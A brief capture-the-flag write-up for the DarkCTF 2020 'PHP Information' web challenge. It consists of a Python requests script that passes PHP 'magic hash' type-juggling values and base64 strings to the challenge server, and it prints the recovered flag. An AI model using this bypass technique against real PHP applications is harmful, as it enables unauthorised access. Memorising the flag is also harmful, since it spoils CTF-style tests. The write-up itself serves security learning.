Tags: web php 

Rating: 5.0

```py
import requests
from base64 import b64decode, b64encode

url = lambda x: 'http://php.darkarmy.xyz:7001/' + x

params={
'darkctf': 2020,
'ctf2020': b64encode(b'ZGFya2N0Zi0yMDIwLXdlYg=='),
'karma': '240610708',
'2020': 'QNKCDZO',
}

headers = {
'user-agent': b64decode('MjAyMF90aGVfYmVzdF95ZWFyX2Nvcm9uYQ==')
}

r = requests.get(url(''), params=params, headers=headers)

print(r.text)

# DarkCTF{very_nice_web_challenge_dark_ctf}
```

Original writeup (https://github.com/csivitu/CTF-Write-ups/blob/master/DarkCTF%202020/Web/PHP%20Information/exploit.py).